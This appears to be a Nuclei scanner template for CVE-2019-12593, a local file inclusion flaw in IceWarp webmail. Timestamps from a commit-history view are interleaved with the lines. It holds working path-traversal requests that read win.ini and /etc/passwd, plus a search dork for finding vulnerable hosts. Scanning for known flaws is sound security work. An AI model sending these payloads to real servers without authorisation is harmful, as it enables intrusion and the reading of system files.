nuclei-templates/cves/CVE-2019-12593.yaml

27 lines
774 B
YAML
Raw Normal View History

id: cve-2019-12593
2020-09-05 06:49:58 +00:00
info:
name: IIceWarp <=10.4.4 - Local File Inclusion
author: pikpikcu
2020-09-05 07:11:21 +00:00
severity: high
2020-09-05 06:49:58 +00:00
# reference: https://nvd.nist.gov/vuln/detail/CVE-2019-12593
2020-09-05 07:00:51 +00:00
# Google Dork:-Powered By IceWarp 10.4.4
2020-09-05 07:00:15 +00:00
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
2020-09-05 06:49:58 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[intl]"
2020-09-05 07:11:21 +00:00
- "root:x:0"